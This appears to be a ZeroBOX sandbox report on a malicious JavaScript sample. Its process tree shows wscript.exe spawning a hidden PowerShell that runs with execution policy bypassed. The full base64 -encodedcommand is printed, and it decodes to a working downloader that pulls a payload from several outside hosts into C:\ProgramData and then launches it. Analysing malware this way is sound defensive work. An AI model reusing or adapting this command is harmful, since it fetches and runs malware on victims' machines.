popup
| ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Behavioral Analysis

Process tree

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Lozrnlwd.js

    3048

    • wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Local\Temp\Lozrnlwd.js" Briguer RipenersCerebella BetaxedBeblooded

      2188

      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JAB0AGgAZQBpAG4AZQAgAD0AIAA3ADEAMAA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADgAOwAkAEYAZQBhAHoAZQBkAEcAaQB0AG8AeABpAGcAZQBuAGkAbgAgAD0AIAAiAFMAeQBtAGIAbwBsAGkAcwBhAHQAaQBvAG4AUgBlAHMAdAByAGUAbgBnAHQAaABlAG4AZQBkACIAOwAkAG0AaQBjAHIAYQBtAG8AYwBrAFMAdQBwAGUAcgBpAG4AZABpAHYAaQBkAHUAYQBsAGkAcwB0ACAAPQAgACIAUgBlAHMAdQBsAHQAbABlAHMAcwBsAHkATwB0AHQAbwBtAGEAbgBlAGEAbgAiADsAJABjAGEAdABlAGcAbwByAGkAcwBpAG4AZwBNAG8AaABhAG0AbQBlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAFEAQQB1AEEARABJAEEATQB3AEEAMgBBAEMANABBAE0AZwBBAHkAQQBDADQAQQBPAEEAQQAzAEEAQwA4AEEAVgBnAEEAeQBBAEUATQBBAE4AdwBBAHYAQQBFAEkAQQBlAGcAQgB4AEEARQBVAEEATgBBAEEAeABBAEEAPQA9AFMAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBPAEEAQQB1AEEARABJAEEATgBRAEEAMQBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQB4AEEARABrAEEATQBnAEEAdgBBAEcAdwBBAGUAZwBCAFMAQQBDADgAQQBPAEEAQgBzAEEASABRAEEAUgBRAEEAeABBAEEAPQA9AFMAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAFEAQQB1AEEARABJAEEATQB3AEEAMgBBAEMANABBAE0AZwBBAHkAQQBDADQAQQBNAFEAQQB4AEEARABRAEEATAB3AEIAMQBBAEcAVQBBAGQAdwBCAG8AQQBFAGMAQQBMAHcAQgBSAEEARwBFAEEAVQBnAEIAUQBBAEcAMABBACIAOwBmAG8AcgBlAGEAYwBoACAAKAAkAHcAYQBtAGIAbABlAGQAIABpAG4AIAAkAGMAYQB0AGUAZwBvAHIAaQBzAGkAbgBnAE0AbwBoAGEAbQBtAGUAZAAgAC0AcwBwAGwAaQB0ACAAIgBTAGYAIgApACAAewAkAGEAZgB0AGUAcgB3AHIAaQBzAHQAQgB5AHAAbABhAGMAZQAgAD0AIAAzADMANQA7ACQAUwB1AGIAdgBpAHQAcgBlAG8AdQBzAGwAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAWQBBAEwAZwBBADMAQQBEAEUAQQBMAGcAQQB5AEEARABVAEEATQBnAEEAdQBBAEQARQBBAE8AQQBBAHcAQQBBAD0APQBCAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAUQBBAFkAUQBCADAAQQBHADgAQQBiAEEAQgBwAEEASABRAEEAYQBRAEIAagBBAEUAMABBAFkAUQBCAGoAQQBHAHMAQQBhAFEAQgB1AEEASABRAEEAYgB3AEIAegBBAEcAZwBBAFoAUQBCAHoAQQBDADQAQQBiAEEAQgBwAEEAQQA9AD0AQgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADUAQQBEAFEAQQBMAGcAQQB4AEEARABjAEEATwBBAEEAdQBBAEQARQBBAE8AUQBBAHoAQQBDADQAQQBNAFEAQQB5AEEARABZAEEAIgA7AHQAcgB5ACAAewAkAG0AbwBuAHQAcgBlAGEAbAAgAD0AIAAyADYANQA7ACQAZgByAGkAZwBoAHQAZQBuAGUAcgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAB3AGEAbQBiAGwAZQBkACkAKQA7AGkAdwByACAAJABmAHIAaQBnAGgAdABlAG4AZQByACAALQBPACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAcwBwAHIAYQB3AGwAaQBlAHMAdAAuAGQAZQBmAGUAbQBpAG4AaQB6AGUAOwAkAGcAcgBhAHAAZQB5AHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEUAQQBNAHcAQQB1AEEARABVAEEATQB3AEEAdQBBAEQASQBBAE0AUQBBAHgAQQBDADQAQQBOAGcAQQB3AEEAQQA9AD0AVgBTAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE4AZwBBAHUAQQBEAEkAQQBOAFEAQQB4AEEAQwA0AEEATQBRAEEAMABBAEQATQBBAEwAZwBBAHgAQQBEAE0AQQBNAEEAQQA9ACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAcwBwAHIAYQB3AGwAaQBlAHMAdAAuAGQAZQBmAGUAbQBpAG4AaQB6AGUAKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAxADYAMgAyADIAMQApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAFEAdwBBADYAQQBGAHcAQQBVAEEAQgB5AEEARwA4AEEAWgB3AEIAeQBBAEcARQBBAGIAUQBCAEUAQQBHAEUAQQBkAEEAQgBoAEEARgB3AEEAYwB3AEIAdwBBAEgASQBBAFkAUQBCADMAQQBHAHcAQQBhAFEAQgBsAEEASABNAEEAZABBAEEAdQBBAEcAUQBBAFoAUQBCAG0AQQBHAFUAQQBiAFEAQgBwAEEARwA0AEEAYQBRAEIANgBBAEcAVQBBAEwAQQBCAHcAQQBIAEkAQQBhAFEAQgB1AEEASABRAEEATwB3AEIAVwBBAEgAVQBBAFoAUQBCAEsAQQBGAE0AQQAiADsAJABQAG8AbAB5AHAAaQBkAG8AbQBBAGIAbwByAHQAaQB2AGUAbgBlAHMAcwAgAD0AIAAiAGMAZQBwAGgAYQBsAG8AdAByAGEAYwB0AG8AcgBJAHIAaQBzAHIAbwBvAHQAIgA7ACQAYgBhAHIAYgBlAHIAaQBuAGcARABlAGMAawBlAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHQAQQBHADgAQQBiAGcAQgBsAEEARwAwAEEAWgBRAEIATgBBAEcAVQBBAGIAQQBCAHYAQQBHAFEAQQBhAFEAQgB6AEEASABRAEEAYwB3AEEAdQBBAEcAMABBAGIAdwBCAHUAQQBHAFUAQQBlAFEAQQA9ACIAOwBiAHIAZQBhAGsAOwBWAHUAZQBKAFMAOwB9AFYAdQBlAEoAUwA7AH0AIABjAGEAdABjAGgAIAB7ACQAZQB4AHAAaQBhAHQAZQBzACAAPQAgADUAMwA1ADsAJABMAGUAdQBjAG8AYwB5AHQAbwBwAGUAbgBpAGMATwB3AGUAbgBpAGEAIAA9ACAAOQA2ADUAOwB9AH0AJABkAGkAcwBlAG4AZgByAGEAbgBjAGgAaQBzAGkAbgBnAFMAeQBtAGIAbwBsAGkAegBlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEQAQQBIAEkAQQBkAFEAQgBqAEEARwBrAEEAYwB3AEIATgBBAEgAVQBBAFoAQQBCAGkAQQBHAEUAQQBiAGcAQgByAEEAQwA0AEEAYgBBAEIAcABBAEcAMABBAGIAdwBBAD0AbABPAHMAZwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEUAQQBOAFEAQQB1AEEARABFAEEATgB3AEEAMQBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQB4AEEARABRAEEATQBnAEEAPQBsAE8AcwBnAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAQQBBAGMAZwBCAHYAQQBIAEEAQQBkAFEAQgBpAEEARwB3AEEAYQBRAEIAagBBAEcARQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQQB1AEEARwB3AEEAYgB3AEIAMgBBAEcAVQBBAGwATwBzAGcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABRAEEATgB3AEEAdQBBAEQARQBBAE0AQQBBADAAQQBDADQAQQBNAFEAQQB5AEEARABjAEEATABnAEEAeABBAEQASQBBAE0AQQBBAD0AIgA7AA=="

        2404

Process contents

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID
default registry file network process services synchronisation iexplore office pdf